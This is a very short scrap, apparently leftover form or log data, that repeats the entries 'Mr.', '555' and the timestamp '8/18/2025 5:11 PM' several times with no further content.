Mr.

555

8/18/2025 5:11 PM
Mr.

555

8/18/2025 5:11 PM
Mr.

555

8/18/2025 5:11 PM
Mr.

555